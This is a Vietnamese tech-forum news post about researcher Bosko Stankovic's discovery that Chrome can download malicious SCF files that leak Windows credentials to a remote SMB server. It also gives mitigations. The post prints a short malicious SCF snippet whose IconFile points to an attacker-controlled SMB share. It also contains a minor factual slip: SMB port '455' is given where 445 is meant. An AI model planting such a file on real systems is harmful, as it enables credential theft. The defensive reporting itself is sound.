- Tham gia
- 2/2/17
- Bài viết
- 5,766
- Được thích
- 7,748
2936
#1
Nhà nghiên cứu Bosko Stankovic của DefenseCode đã phát hiện ra rằng chỉ cần truy cập vào một trang web có chứa tệp SCF độc hại, nạn nhân có thể bị tin tặc lấy thông tin đăng nhập máy tính của họ thông qua Chrome và giao thức SMB.
Kỹ thuật này không phải là mới, và đã được khai thác bởi Stuxnet - một loại phần mềm độc hại mạnh được thiết kế để tiêu diệt chương trình hạt nhân của Iran - sử dụng các tệp LNK của Windows để xâm nhập hệ thống. Tuy nhiên, đây là lần đầu tiên kỹ thuật này được sử dụng trên Google Chrome.
Chrome + SCF + SMB = Ăn cắp thông tin của Windows
Định dạng tập tin SCF (Shell Command File) tương tự như các tệp LNK và được thiết kế để hỗ trợ một số lệnh Windows Explorer giúp xác định biểu tượng trên máy tính của bạn, chẳng hạn như My Computer và Recycle Bin.
"Hiện tại, kẻ tấn công chỉ cần lôi kéo nạn nhân (sử dụng Google Chrome và Windows) truy cập trang web của mình là đã sử dụng lại các chứng chỉ xác thực của nạn nhân", Stankovic viết trong một bài đăng trên blog, mô tả lỗ hổng.
Về cơ bản, các tệp LNK xác định biểu tượng trong Windows có cú pháp như sau:
Code:
[Shell]
Command = 2
IconFile = explorer.exe, 3
- Vị trí biểu tượng
- Link dẫn đến hình thu nhỏ, tên ứng dụng và vị trí của nó.
Nhưng thay vì đặt vị trí của hình ảnh biểu tượng, tệp tin SCF độc hại do kẻ tấn công tạo ra chứa vị trí của máy chủ SMB từ xa (do kẻ tấn công kiểm soát).
Code:
[Shell]
IconFile = \\ 170.170.170.170 \ icon
Tuy nhiên, theo các cuộc tấn công của Stuxnet, Microsoft buộc các tập tin LNK phải tải các biểu tượng của họ chỉ từ các tài nguyên cục bộ nên họ không còn dễ bị tấn công.
Làm thế nào để ngăn chặn các cuộc tấn công liên quan đến xác thực SMB
Rất đơn giản, bạn chỉ cần chặn kết nối SMB gửi đi (các cổng TCP 139 và 455) từ mạng cục bộ đến mạng WAN thông qua tường lửa để các máy tính local không thể truy vấn các máy chủ SMB từ xa.
Stankovic cũng khuyến cáo người dùng xem xét việc tắt tự động tải xuống trong Google Chrome bằng cách vào Settings > Show advanced settings, sau đó check vào cài đặt Ask where to save each file before downloading.
Tùy chọn này cho phép bạn tự phê duyệt mỗi lần trình duyệt tải tập tin xuống, làm giảm đáng kể nguy cơ bị tấn công bằng tập tin SCF. Google đã nhận biết các lỗ hổng này, và đang chuẩn bị đưa ra bản vá. Tuy nhiên, không thể biết chính xác bao giờ thì bản vá mới được đưa đến tay người dùng.
Xem thêm:
- Apple phát hành hàng chục bản vá bảo mật cho thiết bị của mình do WannaCry quá mạnh | TECHRUM.VN
- Mẹo truy cập nhanh Control Panel thông qua File Explorer trong Windows 10 | TECHRUM.VN
- Tổng hợp phần mềm phòng chống WannaCry hữu hiệu được nhiều người sử dụng | TECHRUM.VN
- Đây là Lumia RX-130, smartphone có đến 2 khe SIM và 2 khe thẻ nhớ từng được Microsoft thử nghiệm | TECHRUM.VN
Ngô Viết Hùng / Via Thehackernews
Last edited by a moderator: